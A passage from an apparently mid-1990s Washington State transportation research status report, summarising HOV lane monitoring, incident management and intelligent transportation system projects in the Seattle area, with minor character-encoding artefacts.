Data collection is now proceeding throughout the Seattle area.  In 
addition to obtaining travel time and vehicle occupancy in the freeway 
mainline, vehicle occupancy is also being obtained at some ramps.  Ramps 
are usually easier to monitor, and should reflect occupancy changes 
sooner than the higher volumes on the mainline.
This project was supplemented to evaluate the change from a 3 person 
carpool definition to a 2 person carpool definition on I-5 north of the 
Seattle CBD.  The draft report for the 2+ demo (prepared by TRAC and TTI) 
was received on January 27, 1992.  The final report for the 2+ demo is 
now available.  Contact Eldon if you want a copy.  The results indicate 
that vehicle occupancy decreased, reliability decreased and travel time 
increased in the northbound direction, much of the driving public 
approves of 2+, and there was no evidence that the project affected 
accident rates.  The steering committee made three recommendations.  
First, the results of the demonstration project do not support existing 
policies.  Second, the 2+ should revert to 3+ after a minimum 60 day 
period.  Third, future occupancy requirement decisions should be based on 
a performance standard that measures speed and reliability.
A second supplemental project to the original project was funded.  This 
second project developed a performance standard that measures speed and 
reliability.  The intention was to have an easily measured reliability 
standard for HOV lanes, which could be used when considering revising the 
carpool definition for a particular HOV corridor.  During April and May, 
1992, data collection was done on the I-5 North corridor that was used in 
developing the standard.  A performance standard was adopted by the WSDOT 
HOV Policy Board on August 13, 1992.  It reads:  "HOV lane vehicles 
should maintain or exceed an average of 45 miles per hour or greater at 
least 90 percent of the times they use that lane during the peak hour 
(measured for a consecutive six-month period)."
Collection of data continues throughout the area during each Monday to 
Friday peak period at about 20 different sites.  The draft report was 
distributed before the end of March, 1994.  Review comments have been 
received and the report has been revised.  The final report was shipped 
to the Research Office for printing in December, 1994.  Eldon got the 
final report back to fix some page numbering problems and returned it to 
the Research Office on February 8, 1995.  Final report complete.  Project 
complete.

%	.c.HOV Lane Evaluation and Monitoring (Phase II).;  (Eldon L. 
Jacobson or CyJUlberg)  This is the ongoing data collection and reporting 
project.  Auto occupancy data are being collected every morning and 
evening peak period Monday through Friday.  A 486 computer with a high 
capacity hard drive has been acquired to aid in the data analysis and 
storage.  A two page legislative briefing report has been prepared.  It 
will be distributed (probably in the Ex*Press) with changes and updates 2 
or 3 times a year.  Quarterly data updates are being prepared, which will 
update one of the appendices in the final report described in the 
previous project.  The initial quarterly report is complete (this will 
actually add the 6 quarters that follow the 4 quarters in Appendix B of 
the report in the previous project).

%	.c.I-5 South HOV Lane Accident Analysis;  (Eldon L. Jacobson)  
This is an in-house project to analyze the before and after accident 
information for the HOV lane termination area at the top of the 
Southcenter hill.  The accident data was provided by the Northwest 
Region.  A draft report was circulated on June 1, 1994, and review 
comments are being received.

%	.c.Intercounty Carpool Profile.;  (Eldon L. Jacobson or Cy 
Ulberg) This project will provide knowledge of why people choose to ride 
share.  The primary method to acquire information about a broad range of 
carpools in the two-county region (Snohomish and King counties) will rely 
on surveys of a random sample of people observed in carpools on selected 
freeways, arterials, and streets.  A large number of surveys (on the 
order of 1000) will be conducted by mail, and they may include small 
incentives to encourage a high return rate.  A follow-up survey will be 
conducted after one year.  A smaller sample will be contacted for more 
intensive personal interviewing (focus groups).  This project will be 
used to enhance the HOV 2+ evaluation.  The project match will come from 
that project in order to direct questions toward the carpool definition 
change.  WeUre waiting for the funds to be released by Metro to start the 
project.  The funds have been released and a U.W. budget number assigned 
to the project.  An initial literature review has been done.  Carpool 
license plates have been collected and the public opinion survey is being 
finalized for printing.  The survey was printed and mailed out in June, 
1994.  Surveys have been returned and have been coded for analysis.  The 
project has been put on hold until early 1995, as the graduate student 
who is working on the project, Matt Benuska, is studying for three months 
in South Korea.

%	.c.An Analysis of Factors Accounting for Successes and Failures 
in the Acceptance and Utilization of Employer-Based TDM Programs.;  (Bill 
Legg or Cy Ulberg) This project will carefully investigate the processes 
that companies employ to implement TDM programs.  It will develop a model 
of the factors that influence employee's attitudes and lead to actual 
changes in commuting behavior and will be useful to employers throughout 
the state in designing and implementing successful TDM programs.  The 
project will be coordinated with the State Energy Office and to bolster 
the work currently being undertaken because of the commute trip reduction 
legislation.  The scope of work was developed in cooperation with Metro 
and the Energy Office.  A new element  of the project will be the 
addition of a consultant to look at a proactive program for multi- site 
employers to shift personnel around so employees are working at the site 
nearest their home.  
The draft final report has been completed and has been distributed for 
review and comment.  This project has be given a $95,000 supplement for a 
proximate commuting study.  This study has been initiated and a detailed 
evaluation plan is now being developed.  Proximate commuting is the 
concept of decentralizing work so that employees can work closer to their 
residence thereby reducing commuting time and distance.

.c.Incident Management Projects

%	.c.Incident Response Data Base.;  (Bill Legg or Fred Mannering) 
This project will develop and establish an incident response database.  
The database will be used to evaluate incident response measures 
developed and implemented in the Seattle area.  This project was approved 
in February.  The first project meeting with the researchers and the Data 
Annex in Olympia took place the middle of March.  The Data Annex 
installed the CARS database at TRAC on May 27th.  The project team is 
working with WSDOT's 3 western regions and the East Central region to 
establish a database format Incident report that could be used as a 
standard for the entire state.  This format will be compatible with the 
States' MicroCars database.  Work in also being done on a geographical 
representation of the MicroCars database by combining it with a GIS 
system.  This project's completion date was extended to 6/31/94 from 
12/31/93 to permit more testing of the database.
The draft database (the final level of effort for this project) is 
complete and now being used.  We are looking at any additional needs for 
this project beyond the current completed work. 

%	.c.Evaluation and Application of Washington State's Incident 
Response Guide.;  (Bill Legg or Fred Mannering) This project will 
evaluate the effectiveness, appropriateness, and format of the incident 
response guide currently used by WSDOT's North West Region's incident 
response teams.  Based on this evaluation it will produce an updated 
electronic version of the guide for WSDOT's 3 western regions and the 
East Central region.  Each region will able to customize and update the 
documents as needed in the future.
The project is now complete.   

	.c.Incident Management Training for WSDOT Personnel.;  (Bill 
Legg) This project, through training sessions, will
 	introduce the basic language and protocol for the Incident 
Command System to the WSDOT IRT members,
 	summarize new and existing state and federal regulations that 
impact current incident management practices,
 	identify WSDOT IRT training material suitable for periodic 
"refresher" training, &
 	provide information to Maintenance Area Supervisors on the 
importance of effective incident management.
This project began the first of the year (1995) and training will begin 
this summer.  

	.c.The Use of Total Station Surveying Equipment for Accident 
Investigation: A National Perspective.;  (Bill Legg) WSDOT took the 
national leadership role in the implementation of the use of total 
station surveying equipment by the State Patrol as a way to more quickly 
clear major accident scenes.  This project will determine
 	how the use of total station surveying equipment for accident 
investigation has expanded to other parts of the nation,
 	what factors encourage the use of the technology, 
 	what factors discourage the use of the technology, and 
 	how the quantified and perceived benefits change depending on 
local conditions.  
The survey of national law enforcement agencies has been completed.

.c.ITS Projects

% 	.c.North Seattle Advanced Traffic Management System;  (Morgan 
Balogh)  The primary objective of this project is to provide 
communications to the different traffic control system in the I-5 
corridor from Seattle to Marysville.  This will enable coordinated 
operations among the different jurisdictions traffic signal systems and 
the freeway ramp meter system, provide a regional monitoring and data 
sharing system, and receive real-time information on traffic and transit 
conditions.  This project will be expandable to the east and south to 
include the entire Seattle Metropolitan area.  
Many times political and jurisdictional issues prevent coordinating 
adjacent systems.  These issues will be worked out over the course of the 
project.
This project will endeavor to obtain data from several signal systems in 
the I-5/SR 99 corridor in north King County and south Snohomish County.  
The data will be collected by a separate micro-computer through 
communications links with central traffic control systems (and master 
controllers if necessary) belonging to the various jurisdictions 
involved.  The micro-computer will compile the volume, occupancy, and 
operations data and transmit it back out to the participating control 
systems.  Each signal system will independently use the data to improve 
its traffic management capabilities.  TIB funding for this project has 
been obtained.  The City of Seattle was the lead agency for obtaining TIB 
funds.  Oil rebate money is also being used on this project.  The FHWA is 
contributing 3.5 million in state appropriated IVHS money.  
Dave Berg of the WSDOT, NW Region is managing this project.  Farradyne 
System Inc., is the lead consultant on the project.  FSI started work on 
Nov. 29, 1994.  This was the same date that a kickoff meeting was held.  
FSI has just completed the Control Strategy Report for the project (June 
16, 1995).  It is currently under review.  There have been several user 
group meetings with the next scheduled for June 17, 1995.  FSI is 
currently working on the system design.

 %	.c.Graphical Display of Real-Time Transit Coach Locations: Toward 
an APTS for the Puget Sound Region (BusView);  (Morgan Balogh, Dan 
Dailey)  The project will design and demonstrate a system that 
graphically displays real-time transit coach locations to the University 
of Washington campus community.  The system will use Seattle Metro's 
existing automatic vehicle location system as its information source.  
This is a $170,000 project sponsored by WSDOT ($100,000) and TRANSNOW 
$70,000.  The completion date is February 1996.   
The design of the APTS architecture and interfaces is well underway and 
the evaluation of the accuracy of the AVL data is beginning.  The system 
will be demonstrated at a Transit Conference in Spokane in late August.

 %	.c.Traffic Data Acquisition and Distribution (TDAD);  (Morgan 
Balogh, Dan Dailey)  The TDAD project will provide a system that will 
access available traffic databases and store it in a separate database 
for historical, research, and planning purposes.  Agencies will then be 
able to request from the system specific records, and obtain these in 
formats meaningful and useful to them.  The initial system will be 
demonstrated in the Puget Sound area, together with linkages to state 
level databases and applications.  This project is coordinated with the 
North Seattle ATMS.  This project supports regional Congestion Management 
Plans.  The total project cost is $210,000 and is fully funded by the FHWA.
UW staff has interviewed the parties that will benefit by this project.  
They include planning representatives from PSRC, TRIP, FHWA, and the 
WSDOT N.W. Region.  A working paper outlining the system desired by these 
representative has been prepared and reviewed.  The project team is 
currently working with FSI and the North Seattle ATMS project on system 
integration requirements.  

% 	.c.Puget Sound Help Me (PuSHMe) Operational Test;  (Morgan 
Balogh) The WSDOT has received USDOT operational test funding for a Puget 
Sound regional mayday system.  This is a public-private partnership whose 
participants include the FHWA, WSDOT, WSP, David Evans and Associates, 
Inc. (DEA), Sentinel Communications (SenCom), Motorola, IBI Group Inc., 
and the University of Washington.  Other firms involved in this project 
but not actually on contract are McCaw Cellular and Intergraph.  This 
system will allow a traveler to send a signal indicating their location 
when they need assistance directly to a traffic operations center who 
will then dispatch the appropriate units (i.e. tow truck, assistance van, 
WSP, etc.)  
The cooperative agreement between WSDOT and the FHWA signed on August 1, 
1994.  The project started February 3, 1995.  A equipment purchase 
contract was signed between WSDOT and SenCom as of March 3, 1995.  A 
equipment lease between WSDOT and Motorola was signed 4/4/95 .  The 
project Kick-Off meeting is scheduled for March 28, 1995.  The evaluation 
plan is almost complete and should sent to the PuSHMe partners for review 
in late June.  Motorola has installed their GPS Reference station at the 
TSMC on June 15, 1995 and plan to have their Dispatch running in Mid 
July.  SenCom will begin producing their mayday devices in late June.  
Mayday testing should begin in late July or early August. 

 %	.c.A Real Time Traveler Information System for Reducing Urban 
Freeway Congestion: Expansion, Implementation, and Evaluation.;  (Larry 
Senn or Mark Haselkorn) This is a continuation of the earlier Real-Time 
Motorist information project.  Several enhancements will be made to the 
"Traffic Reporter" information system including expanding coverage of the 
display to include all freeways in the Seattle area and to include 
separate information on the HOV lanes.  Efforts will also be made to 
improve the quality of travel time data and the quality of electronic 
data coming from the WSDOT system.  This project will provide delivery of 
the system for use by the public and will evaluate the system under 
actual use.  
Traffic Reporter has been expanded to cover the Puget Sound area.  
Testing is being done to compare "lap top" travel time data to those 
calculated by Traffic Reporter.  Also, usability testing has been 
conducted on the expanded interface, and will continue once the system is 
on display.  Traffic Reporter can now find multiple freeway routes from a 
given origin ramp to a given destination ramp.  Added features include 
the ability to compare speed and trip time between these routes, 
including a comparison of general purpose versus HOV lanes.  
A rough draft of the final report has been turned into TRAC for 
preliminary review and should be ready to go to the Research Office 
soon.  

 %	.c.Improved Congestion Prediction Algorithm.;  (Improved Ramp 
Control Algorithm) (Larry Senn or Nancy L. Nihan)    This project 
continues the search for an improved ramp control algorithm based on 
predictive techniques.  The project objectives are to: (1) evaluate the 
existing data and the performance of the predictive ramp control 
algorithm used to operate the WSDOT traffic systems computer in Seattle, 
develop improvements to the existing predictive ramp control algorithm by 
looking at upstream volumes and lane occupancies and ways to improve 
pattern recognition, testing the new algorithms on more than one section 
of freeway.
Data collection computer modeling runs have been made and contrary to the 
proposal will likely need to be conducted periodically throughout the 
project.  Preliminary analyses have been performed and strategies are 
being discussed to select the algorithm most likely to be productive.  
TSMC data is now available by modem for UW analysis.  Researchers have 
found that the flow divided by the lane occupancy (F/O) provides a better 
indicator of congestion than indicators that are currently in use.  A F/O 
of 90 indicates the onset of congestion and an F/O of 70 provides an 
excellent indicator of congestion.  Storage, which is currently used by 
the freeway system as an indicator of congestion, does not appear to a 
very good indicator (a result also found in the neural network project).  
The final report is in review.  

% 	.c.Improved Error Detection and Incident Detection Using 
Prediction Techniques and Video Imaging.;  (Larry Senn or Nancy L. Nihan) 
This project seeks to improve knowledge of the relationship of volume and 
lane occupancy to the speed of traffic as a means of (1) determining 
invalid detector data and (2) detecting incidents.  In addition the 
project will attempt to improve the ability to identify bad detector 
data.  Video imaging will be used as an independent check of the 
volume/occupancy and speed relationships.  The video imaging system will 
itself be evaluated as an incident detection tool and as a tool to obtain 
vehicle speeds.
Morgan Wong is the primary R.A. on this project.  He has written a 
program to get 20 second data from Autoscope and is modeling the data to 
improve on the existing error and incident detection algorithms.  
TSMC data is now available by modem for UW analysis.  The project team 
has been collecting additional video data for testing Autoscope.  The 
overall opinion of the researchers is that Autoscope works well enough to 
be considered in future installations.  
The draft final report and draft technical report have been submitted for 
review.  

% 	.c.Bellevue Smart Traveler: Using Traveler Information to Reduce 
Downtown SOV Commuting.;  (Eldon L. Jacobson or Mark Haselkorn) This 
project produced and tested a prototype Traveler Information Center 
designed to increase the use of transit and paratransit (carpools and 
vanpools) by downtown Bellevue office workers.  The goal was to locate in 
a downtown Bellevue office complex a prototype computer-based interactive 
Traveler Information Center that provided office workers with greater 
access to flexible, reliable, safe, and time efficient alternatives to 
single occupancy vehicle commuting.  The prototype allowed us to gauge 
the impact of applying ATIS technology to enhancing transit and 
paratransit.  It also allowed us to judge the viability of Traveler 
Information Centers as a way for downtown centers to meet trip reduction 
requirements set by the State of Washington.
The project was funded by WSDOT and FTA.  Work was conducted as a 
partnership between the Bellevue TMA and the University of Washington.  
The project was originally scheduled to begin 7/1/92 and end 10/31/93.  
The FTA funding period ended up being for 15 months, starting 9/30/92, so 
no-cost time extensions were requested of both the FTA and WSDOT in order 
that both funding periods ended at the same time.
Most of the employee's in the office building (Bellevue Place) were 
surveyed.  Since Microsoft doesn't do surveys, focus groups with 
Microsoft employees were done the last week in April, 1993.  The project 
was expanded to cover more buildings in downtown Bellevue.  Will also use 
a public-private partnership utilizing pagers donated by PacTel (now 
Air-Touch).  The telephone equipment was purchased, the initial 
programming of it completed, and it was tested.  A media event showcasing 
the project was done by the U.W. on September 28, 1993.  83 applications 
were received by the TMA as of November 2, 1993.  The kiosk was opened 
for use in Bellevue Place on November 15, 1993.
Three ride groups were formed.  Some of the interesting statistics as of 
the close of the project on April 15, 1994 are:  496 rides offered, 145 
rides sought, 6 confirmed ride matches.  Preliminary conclusions are that 
people were much more willing to offer rides than to accept a ride.  The 
draft technical report has been written and was submitted to TRAC the end 
of August, 1994, for editing and processing.  The initial editing 
generated substantial suggested improvements, so the report was sent back 
to the P.I. for modification in September, 1994.  The draft report has 
been circulated and review comments received.  The P.I. plans on 
incorporating review comments for the final report during the first week 
of July, 1995.

%	.c.In-Vehicle Signing and Variable Speed Limit Demonstration.;  
(Larry Senn) The project is unique in that its objective is the 
enhancement of motorists safety on freeway facilities through the display 
of variable speed limits and other safety messages based on traffic and 
roadway conditions.  These displays are presented using variable message 
signs and in-vehicle equipment.  The proposed project includes the 
implementation of a variable speed limit and motorist alerting system 
featuring the use of low cost in-vehicle radio receivers with 
alphanumeric displays.  The system is to be installed on a forty mile 
section of I-90 approximately 40 miles east of Seattle in the vicinity of 
the Snoqualmie Pass.  The University of Washington will be responsible 
for the evaluation of the system and the experimental design.  
The installation of data stations for collection of "before" data is 
complete and data collection is underway.  Farradyne has continued the 
systems development, and has found solutions to several issues concerning 
the radio communications system and integration of the weather stations.  
FCC licenses for all sites have been obtained.  The construction contract 
with Totem Electric is underway and at least three sign bases have been 
installed.  The production of the Daktronics VMS is underway and the 
inspection of the first sign occurred on June first.  We hope to test the 
in-vehicle devices in '94-'95 using a portable transmitter, however the 
fixed sites will not have communications until '95-'96 when the entire 
project will be operational.  The UW team has conducted an in-depth 
accident analysis based on 5 years of accident data and has continued the 
development of the driving simulator that will be used to evaluate the 
in-vehicle signing equipment.  A detailed evaluation plan has been 
submitted to NHTSA and has been tentatively approved pending some minor 
corrections.  

%	.c.Seattle to Portland Inter-city ITS Corridor Study and 
Communication Plan;  (Morgan Balogh)  We are in the initial stage of this 
project.  There are three main objectives of the project.  The first 
objective is to develop a plan to reduce congestion and improve safety 
along the Seattle to Portland I-5 corridor utilizing Intelligent 
Vehicle-Highway Systems (IVHS) technologies.  The second objective is to 
identify the communications network needed to support the IVHS for the 
corridor.  Additionally, evaluate alternatives and provide 
recommendations for this network to support WSDOTUs other, non-IVHS, 
intra-departmental communications requirements along this corridor.  The 
third objective is to develop general recommendations for a statewide 
WSDOT communication network utilizing the corridor communications 
analysis.  
State matching funds have been identified and approved.  An Agreement 
between the FHWA and the WSDOT for the Seattle to Portland Inter-city ITS 
portion of this project has been made. 
A request for a service contract to select/hire a consultant was 
developed and published September 13, 1993.  The consultant proposals 
went through the first stage of the evaluation process.  This stage chose 
the top 3 proposals.  The representative of each team was asked to give 
an oral presentation on December 7, 1993.  From these presentations David 
Evans and Associates was chosen to be the prime consultant.  The 
consultant began work May 2, 1994.  The consultant has completed 
Technical Memorandum #4, Draft ITS Corridor Plan in May and is developing 
a draft communications plan.  

%	.c.Portland to Boise ITS Corridor Study;  (Eldon L. Jacobson)  
This project is to develop a plan to identify Intelligent Transportation 
System technologies that should improve some of the known transportation 
problems in the Portland to Boise corridor.  One of the known problems is 
the poor weather conditions that can rapidly appear in the Columbia 
Gorge  and the Blue Mountains.  The corridor includes roads on both sides 
of the Columbia River, two railroads, and barge shipping.
The planned $400,000 consultant study is anticipated to be funded by 
FHWA, ITD, ODOT, and WSDOT.  A draft agreement between the FHWA and the 
three state DOTs has been drafted by the FHWA Region office.  The revised 
draft proposal was circulated for final comments and support letters.  
The proposal was submitted to the FHWA the day before the due date of 
August 1, 1994.  Approval from D.C. was received the middle of January, 
1995, provided the scope-of-work is approved by the FHWA region office.  
The draft scope-of-work was circulated for comments the end of February, 
1995.  The FHWA approval is expected mid-March, 1995, with the RFP 
planned late in March or April, 1995.
Kimley-Horn and Associates, Inc., is the consultant that was selected to 
do the study.  The scope-of-work and cost estimate are being worked on 
prior to signing the contract.

%	.c.Seattle to Vancouver, B.C., and Seattle to Spokane ITS 
Corridor Study;  (BillJLegg)  This project is to develop a plan to 
identify Intelligent Transportation System (formally IVHS) technologies 
that should improve some of the known transportation problems in the two 
corridors.  The two corridors may be studied separately, or together, 
depending on whether one or both are approved for funding by the FHWA.  
The planned consultant study is anticipated to be funded by FHWA and 
WSDOT.  
Interviews for final consultant selection will be held on June 22nd.  
Work on this project will begin in the 3rd quarter of 1995.

%	.c.Assessment of ATIS in Washington State.;  (Morgan Balogh) This 
project is primarily funded by FHWA discretionary moneys.  It will 
provide an early evaluation of 4 ATIS in Washington state (FLOW, Traffic 
Reporter, Bellevue Smart Traveler, and the proposed Canadian border 
crossing information system).  The project will develop a matrix of ATIS 
so that appropriate criteria for judging success can be developed and 
applied.  The project will also recommend direction for future ATIS 
development in the state.  Start date for project was 10/01/92 and the 
completion date for the project is 4/30/94.
Tasks completed to date include: (1) Identified classifying system and 
definitions of success for this project.  (2) Designed metrics and 
instruments for assessing Flow.
Delays in the installation of the Vax at TSMC have delayed the 
implementation of Traffic Reporter and consequently the evaluation of 
Traffic Reporter.  That problem has been corrected and the evaluation 
continued.  The final report was submitted to the Research Office in 
March, 1995.  

%	.c.IVHS Data and Information Structure.;  (Morgan Balogh or 
Daniel Dailey)  The overall objective of this project is to develop a 
framework in which to understand, select, and apply wireless data 
communications technology to IVHS development in Washington State.  It 
will (1) review the state of the art of wireless data communications, (2) 
examine promising wireless communication alternatives, (3) perform a 
limited field test of selected wireless data communications, and (4) 
provide the basis for an overall plan to integrate wireless data 
communications into a regional IVHS network.  The final report for this 
project is due December 31, 1994.
The final report was submitted to the Research Office in March, 1995.

%	.c.Investigation of Video Image Tracking.;  (Morgan Balogh or 
Nancy Nihan)  First generation video imaging systems provide Rtrip-wireS 
type detection, that is they mimic the performance of inductance loops.  
The newer video imaging tracking system not only gathers loop type data 
but RfingerprintsS vehicles to provide tracking capabilities.  Vehicle 
tracking provides travel time and origin destination information which 
has been historically difficult to obtain.
The proposed video imaging system for this project is the MOBILIZER, 
which is provided by Condition Monitoring Systems (CMS) and is in the 
prototype stages of development.  
This project will test collected data for reliability and range of 
usefulness, compare cost effectiveness and total life-cycle cost of the 
CMS system to that of traditional loop detector systems, and if cost 
effective, incorporate the system in the WSDOT Traffic Systems Management 
Center.  The final report for this project is due August 31, 1995.
Most of the technical problems with the MOBILIZER have been worked out 
and testing is continuing.

%	.c.IVHS Backbone Design and Demonstration.;  (Larry Senn or Dan 
Dailey)  This project will (1) design a  demonstration architecture for a 
regional IVHS backbone for the Puget Sound area and (2) construct this 
backbone in order to demonstrate how different types of data gathered 
from distinct agencies can be integrated in a single application.  The 
backbone will be designed to (a) improve interagency and 
multi-jurisdictional sharing of data without disrupting existing 
operations, (b) support existing investment in IVHS technology and system 
development, (c) encourage expansion and innovation, and (d) be 
compatible with federal efforts to develop a national IVHS architecture.  
"The backbone will support traffic data from a multitude of sources while 
making data accessible in a clearly defined manner on a geographically 
distributed network.  This all will be done in an open systems model that 
supports a distributed computing environment, is extensible to larger 
areas, and easily allows new agencies to participate.  
The T1 link to the TSMC and all hardware elements to set up the 
communication have been installed.  Software to extract the data is 
operational.  Loop data has been interfaced to the GIS application.  
Software is being developed to make use of the loop data for future 
research.  The final report is being wreitten.  

%	.c.Demonstration of ATIS/ATMS Data Fusion in a Regional IVHS.;  
(Larry Senn or Dan Dailey)  This project proposes to design, construct, 
and demonstrate a data fusion system for use in a regional IVHS system.  
The fusion system will combine data for multi-agency and 
multi-jurisdictional sources to provide a more accurate, real-time 
picture of the transportation system.  This fusion system will operate in 
a distributed computing environment that encourages interagency 
cooperation.  
The computer has been ordered and WSDOT and Metro have been contacted.  
An IVHS application has been written which displays both congestion data 
from loops and real time position of transit vehicles on a GIS based 
map.  King County Metro is being contacted for an improved map database.  
A report is being written in conjunction with an IEEE Intelligent 
Vehicles Conference "95.  

%	.c.IVHS - Network and Data Fusion.;  (Larry Senn or Dan Dailey)  
This Federally funded project will progress from specific regional issues 
investigated in other related projects and generalize by creating key 
network and fusion components that are transferable to other regions and 
countries.  The project will (1) investigate , design, and document an 
encoding scheme, including ways to include temporal information with 
spatial information, for standardization of traffic and traveler 
information, (2) use this encoding scheme to demonstrate a layer between 
application and transport layers, and (3) work with another related IVHS 
research center to use the encoding scheme in a demonstration of its use 
in inter-regional IVHS communication.  
The investigator has started investigation of FIPS spatial data standard 
in detail and determined that the full standard is unwieldy for the 
design of our data encoding system.  Adopting an object oriented paradigm 
to construct self defining data streams.  The methodology for 
constructing the self defined data streams is the encoding stream 
promised for this project.  

%	.c.Investigation of Automatic Vehicle Location Systems for 
Traveler Information.;  (Larry Senn or Mark Haselkorn)  This project will 
use Metro AVL information to improve information available to travelers 
and transportation managers.  
Metro AVL data can now be displayed on any X-terminal connected to the 
Internet and has been demonstrated many times.  This concludes the 
research portion of the project and a draft final is being formatted foin 
prepatration for review.  

%	.c.Ramp Control via Neural Network Control.;  (Larry Senn or 
Deirdre Meldrum)  This project will develop and test a new ramp metering 
algorithm by using an artificial neural network congestion predictor and 
a multi-variable control system.
Artificial neural networks have been constructed and tested.  Promising 
results have been obtained with 1 minute data being used to predict 
volumes and occupancies 1 minute ahead, and somewhat less promising 
results have been obtained with 5 minute data.  The draft technical 
report has been sent to the Research Office for review.

%	.c.Fuzzy Logic Ramp metering.;  This project will move toward 
developing the neural network forecasting and fuzzy logic control system 
including in depth testing using models and on the existing SC&DI 
system.  If budget and time allows the system will be implemented within 
this project.  This project is just starting.  

%	.c.SWIFT - Seattle Wide-area Information For Travelers.;  (Larry 
Senn, Mark Haselkorn, Dan Dailey)  This project is a $7.4 million IVHS 
Operational test of an FM sideband data system which will be used to 
deliver traffic and transit information.  Data will be extracted from 
WSDOT's freeway ramp control computer, Metro Transit's vehicle location 
system, and augmented with information from Metro Traffic Control.  The 
information will be formatted and sent to Seiko Telecommunication System 
for transmission to devices.  The devices include a watch (or pager) 
based on Seiko's Message Watch, Delco Electronics' Telepath car radio 
that includes a GPS to give distance and bearing to a destination, and a 
palm top computer that will be supplied by IBM which will provide bus 
locations and graphic displays of traffic conditions.  Etak will supply 
geo-coding, mapping, and data entry interfaces.  The test will occur in 
1996 after the devices are programmed and developed.  
The contract With the SWIFT project team was signed on January 10, 1995 
and work has commenced.  An evaluation plan from SAIC was submitted at 
the March 14 Steering Committee meeting and was accepted by the team with 
minor changes.  The UW team is working extensively on the network 
required to deliver SWIFT information.  This project is proceeding on 
schedule.  

%	.c.SWIFT Smart Traveler:  (Larry Senn, Dan Dailey)  This project 
is a companion to the SWIFT project and will allow ad hoc ridesharing 
amongst UW employees.  The large employer base combined with the 
availability of desktop computers and the campus network should allow for 
greater number of ride matches than found in previous projects.  Web 
pages have been created, the server is being set up, and geocoding has 
started to establish rideshare locations.  

%	.c.NEXRAD: NEXt Generation Weather RADar.;  (Larry Senn, Tom 
Seliga)  This project is investigating potential applications for the new 
doppler weather radar in transportation.  The potential uses of accurate 
short term weather predictions include better maintenance scheduling and 
transit operation improvements from early snow warnings, wind warnings 
for ferries, and for research into the traffic impacts of inclement 
weather.  
The investigators have obtained a disdrometer to assess the distribution 
of drop sizes in the region, are developing an algorithm for tracking 
storms, have arranged for data access from the weather radar, and have 
obtained a SUN workstation for use in the project.  Phase 2 of this 
project has been funded and will continue the work.  There will be no 
report for Phase 1 as it was a preliminary investigation.  

%	.c.Increasing Awareness of Transportation Options Through 
Riderlink.;  (EldonJL.JJacobson)  This FHWA/FTA Operation Action Program 
project intends to develop a Metro database infrastructure that can be 
used to make transit information (and other information) available at 
selected work sites.  Originally the intent was to team up with US. West 
Community Link's planned videotext service (The original project was 
titled: Increasing Public Awareness of Transportation Options Through 
Videotext).  Since the videotext service has been delayed or abandoned, 
the use of videotext was replaced by planning on using existing computer 
networks of some of the employers in the Overlake area between Redmond 
and Bellevue.
Metro assigned Catherine Bradshaw to coordinate the project.  Initial 
planning and coordination work began in March, 1994.  A detailed 
evaluation plan dated June 21, 1994, has been submitted.  Quarterly 
reports are being submitted.  The following three documents are 
available: Concept Document, Requirements Document, and Evaluation Plan.  
I have been able to access the Riderlink initial data pages from my 
office over the Internet.  During January, 1995, Metro publicized the 
project and made Riderlink available on a World Wide Web site on the 
Internet to disseminate the information to existing networks at employer 
sites.  All the Overlake TMA sites have connections to Riderlink.  As of 
the end of February, 1995, nearly 4,000 people from all over the world 
have accessed Riderlink.  Metro has continued to include more bus 
schedules and route maps in the Riderlink system.

%	.c.Community Transit Arterial System Area-Wide Priority (CT 
ASAP);  (EldonJL.JJacobson)  This is the IVHS operational test project 
that was earmarked by congress for Snohomish County (Community Transit).  
A proposal was submitted in February, 1994, to DC. requesting $1,500,000 
in Federal funds (75%) which will be matched with $375,000 in Community 
Transit funds (25%).  This project plans to implement the most cost 
effective portion of the Community Transit Arterial HOV study, which was 
completed in March, 1993.  That means installing a bus priority system at 
about 100 traffic signals in Snohomish County.  The North Seattle ATMS 
project will utilize the data and METRO will install the same signal 
priority system on SR 99.  This will be the first large scale area-wide 
test of a signal priority system (Pierce Transit has jumped into the 
forefront of testing signal priority, and may have a different signal 
priority system operational in Tacoma around March, 1995).
The proposal was approved and an agreement between FHWA and WSDOT has 
been drafted by FHWA.  At a coordination meeting on May 10, 1994, it was 
decided to combine this project with part of the SR 99 signal project, so 
as to only have one signal priority project within Snohomish County 
(Metro does not have authority to do any work outside King County).  The 
WSDOT-FHWA Cooperative Agreement was approved on June 17, 1994.  WSDOT 
Northwest Region is preparing the Local Agency Agreement between WSDOT 
and Community Transit.  The Local Agency Agreement has been sent to 
Community Transit.  The project may be revised in how it is coordinated 
with two other related projects in the area (the SR 99 project and the 
Metro AVI purchase project).  
As of March, 1995, the Local Agency Agreement is close to being 
finalized.  Larry Ingalls of CT is developing a work plan for the 
project.  Installation of hardware on the buses is dependent on the Metro 
region wide AVI purchase project.

.c.Additional ITS Projects

%	.c.Regional Automated Trip Planning.;  (Wayne Watanabe) King 
County Metro is participating with Community Transit and Pierce Transit 
in the development of a regional transit trip planning system.  The 
system will allow any information operator at any of the three agencies 
to enter origins and destinations within the region.  The system will 
automatically produce a trip itinerary including travel times, fares, and 
transfers.   Current effort is focused on developing geographic 
information system (GIS) hardware and software capability in Pierce and 
Snohomish counties.  King County is nearly done with its GIS component.  
This project is scheduled to be complete in 1997.

%	.c.Regional Ridematch.;  (Roland Bradley) King County Metro is 
participating with Community Transit and Pierce Transit in the 
development of regional ridematching software.  The system will allow 
ridematch staff at any of the three agencies to enter ridematch requests 
into a regional database.  This system will replace an existing regional 
ridematch system that limits the ability of agencies to offer geographic 
information system based matches, match maps for customers, and on-line 
ridematching.  The project is scheduled to be complete in 1997.

%	.c.Regional Ridematch Hotline.;  (Roland Bradley) This project 
will provide one 1-800 telephone number for anyone in King, Snohomish, 
and Pierce counties to use for ridematch assistance.  This project is 
scheduled to be complete in 1996.

%	.c.Regional Fare Integration Project.;  (Candace Carlson) King 
County Metro is participating with Community Transit, Pierce Transit, 
Everett Transit, Kitsap Transit, Washington State Ferries, the RTA, PSRC, 
and the Cascadia Project to provide seamless regional fare media that 
makes it easier to make inter-county trips within the Puget Sound 
region.  The project team is currently evaluating several technologies 
including smart cards and magnetically encoded cards.  The analysis phase 
will conclude in 1995 and a demonstration of the selected technology will 
be in place by the end of 1996. 

%	.c.Smart Bus.;  (David Cantey) King County Metro is beginning the 
implementation of a smart bus strategy that will integrate electronic 
information systems on-board buses.  The current order for 360 buses 
includes J-1708 wiring which will provide the backbone of the "vehicle 
area network."  J-1708 is an SAE standard developed and adopted by ITS 
America.  A contractor has been hired to integrate the automatic 
